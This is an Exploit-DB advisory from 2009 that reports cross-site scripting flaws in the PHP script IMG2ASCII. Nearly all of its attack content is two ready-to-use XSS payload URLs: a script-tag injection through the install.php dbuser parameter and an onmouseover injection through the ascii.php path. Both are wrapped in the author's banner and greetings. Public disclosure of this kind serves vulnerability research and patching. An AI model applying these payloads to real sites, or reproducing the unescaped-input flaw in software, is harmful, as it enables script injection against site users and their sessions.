IMG2ASCII - Cross-Site Scripting

EDB-ID:

10690

CVE:

N/A




Platform:

PHP

Date:

2009-12-26


========================================================================================                  
| # Title    : IMG2ASCII Cross Site Scripting Vulnerability                            |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   : 10690                                                                   |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : IMG2ASCII � Ueli Weiss (mailto:gweilo83@hotmail.com)                    |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://localhost/img2ascii/install.php?dbhost=DZ-ghost-Team&dbbase=Algeria-Hackerz&dbcreate=on&dbuser=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&dbpass=Hacked-by-indoushka&send=Install
| 2- http://localhost/img2ascii/ascii.php/1"+onmouseover=alert(213771818860)+
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------